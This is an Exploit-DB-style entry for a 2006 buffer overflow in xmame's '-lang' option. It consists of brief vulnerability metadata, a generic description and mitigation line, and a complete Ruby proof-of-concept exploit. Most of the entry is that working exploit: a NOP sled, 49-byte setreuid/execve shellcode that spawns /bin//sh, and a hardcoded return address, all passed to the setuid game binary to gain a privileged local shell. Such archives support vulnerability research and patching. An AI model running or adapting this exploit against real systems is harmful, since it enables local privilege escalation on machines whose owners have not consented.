PoC code for xmame "-lang" options

vendor:

xmame

by:

xwings

N/A

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: xmame

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2006

PoC code for xmame “-lang” options

This is a proof of concept code for exploiting a buffer overflow vulnerability in the xmame application's "-lang" option. The vulnerability is based on the advisory mentioned in the comment section of the code. The code sets the effective user ID and real user ID to execute /bin//sh. It has been tested on Linux debian24 with specific versions of the kernel, gcc, and xmame. The shellcode used is 49 bytes long.

Mitigation:

The vulnerability can be mitigated by applying the necessary patches or updates provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/ruby

#
# One of the PoC code for xmame "-lang" options.
# Advisory is base on : http://kerneltrap.org/node/6055
#
# by xwings at mysec dot org
# url : http://www.mysec.org , new website

# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1)
# xmame 0.102 , ./configure && make && make install
#


#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes.
shellcode =     "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+
                "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+
                "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+
                "\x31\xdb\xcd\x80"

vulnpath        = "/usr/games/xmame.x11"
argvopt         = "-lang"

ret = (0xbfffe8da) 
retadd  = ([ret].pack('V'))

nops    = ("\x90" * (1056 - (shellcode.length + retadd.length)))
buffer  = nops+shellcode+retadd

system(vulnpath,argvopt,buffer)

# milw0rm.com [2006-01-10]